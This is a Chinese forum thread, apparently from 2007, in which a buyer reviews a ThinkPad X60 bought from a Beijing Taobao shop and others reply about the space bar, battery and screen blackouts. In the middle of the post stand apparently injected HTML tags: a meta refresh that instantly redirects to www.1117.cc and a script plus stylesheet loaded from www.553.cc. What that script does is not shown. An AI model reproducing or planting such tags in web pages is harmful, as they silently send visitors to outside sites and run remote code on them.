开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] X60 B61购机手记+使用半月的感受

偶购机算是利索的,一开始的目标就是小黑,水本。选小黑是因为我以前就是小黑,感觉挺皮实。选水本自然是因为没米。然后就是找哪的水本可靠,再怎么说也是1w多的东东啊。听北京一朋友说xy挺好,他们单位买了好几台也没什么问题,只这么一说我就动心了,之后观望了一阵子,感觉这里人气真的挺旺,再加上偶耳根比较软,别人冲我一嚼我就决定了。我的原则是,一定要轻,于是锁定了X60,至于B61,呵呵,完全是为了满足虚荣心::71:: 。正好赶着放寒假的时候就跑到北京购机来了。找地方不怎么费劲,验机也是走走形式,装机耗了些时间,xy态度不错,生意也真的是挺好,一直有人捧场。据说这是最后一台B61::85:: ,所以啥也没说,很快就交钱走人了。

过年的时候没顾上管它,这不过完年了,上来和大家分享一下我的感受。

1、它确实小,确实轻巧。和我以前那个比起来感觉舒服多了,顺便说一下,偶以前的是IBM R50e,也是水的(日行),呵呵。
2、有个Lenovo的标识,不太喜欢,不过也许习惯就好了。
3、如各位所说,空格键的确是左端要翘一些,不过用起来似乎没有什么影响,要是没人说,我自己还没发现呢。当然,其他的键我还是没看出来。
4、还有就是不太喜欢它的八芯电池,多出来一大节,不好看。不过时间确实长,我听听歌上上网,能用6个小时左右,不知道以后怎样。
5、缺点也有,和我以前的本本比起来,按键声音有点大,硬盘声音也有点大,而且明显感到右手位置上很暖和,不太舒服,不知道大家有没有这样的感觉。
6、蓝牙功能真是好,和我的Sony Ericsson手机可以互传,挺好玩,除此外就不知道还有什么别的作用了。
7、还有个问题,这机器除了开机时会黑一下屏幕之外,正常使用的时候也有这个现象,不过很快,不知道是不是正常?莫非是我突然眼前一黑的幻觉?(我血糖低)

+300---tszmsid
下面简单贴几张吧,有时间了再细细品味
<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

真的是小好多啊

真的是小好多啊

外壳质地也不同哦

外壳质地也不同哦

有Lenovo了

有Lenovo了

空格键左端确实高了些

空格键左端确实高了些

多出来的电池(这是侧面看)

多出来的电池(这是侧面看)

多出来的电池(这是后面看)

多出来的电池(这是后面看)

评分

tszmsid + 300

同机 恭喜
楼主是小黑的忠实粉丝啊!
一对比,还真是小不少啊
小小年纪怎么还低血糖呢
呵呵,老的怎么半呢
LZ两台呀!
解释一下,开机黑一下是因为那个集成显卡在找默认显示器,那是由于我们恢复盘制作的原因.如果用一件恢复不会出现这个问题.
不错,羡慕啊
恭喜楼主!

刚发现X60又降价了!准备出手!
顶.羡慕啊.正在攒米.准备出手T60
羡慕啊 !X60不错 重量轻 携带方便。不过,就是键盘感觉小了些,男人用不爽 !我还是中意 T60
米人啊
原帖由 EddieFan 于 2007-2-28 15:01 发表
解释一下,开机黑一下是因为那个集成显卡在找默认显示器,那是由于我们恢复盘制作的原因.如果用一件恢复不会出现这个问题.

黑一下是因为集成显卡要共享系统内存,我一键恢复过。
有米人~~继续观望中~~呵呵~~
恭喜lz,羡慕ing!
bu cuo
幸福啊
努力赚钱~~~~~!